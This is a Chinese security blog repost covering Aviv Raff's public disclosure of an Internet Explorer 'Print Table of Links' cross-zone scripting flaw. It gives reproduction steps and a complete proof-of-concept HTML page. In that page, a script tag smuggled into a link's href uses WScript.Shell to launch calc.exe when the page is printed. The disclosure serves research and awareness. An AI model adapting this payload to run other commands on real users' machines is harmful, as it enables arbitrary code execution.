Aviv Raff的IE0day,公布了 's

admin 2017年5月7日21:05:03评论536 views字数 737阅读2分27秒阅读模式
摘要

来源:Sowhat的blog前两天提到Aviv搞得这个“找”0day活动(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html),今天他公布细节了。

MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

来源:Sowhat的blog

前两天提到Aviv搞得这个“找”0day活动(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html),今天他公布细节了。

MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 Aviv Raff的IE0day,公布了  's

重现:
1.下面这个地方打上勾
Aviv Raff的IE0day,公布了  's

2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html
<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(‘WScript.Shell’);x.Run(‘calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>

这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月7日21:05:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Aviv Raff的IE0day,公布了 'shttp://cn-sec.com/archives/47829.html

发表评论

匿名网友 填写信息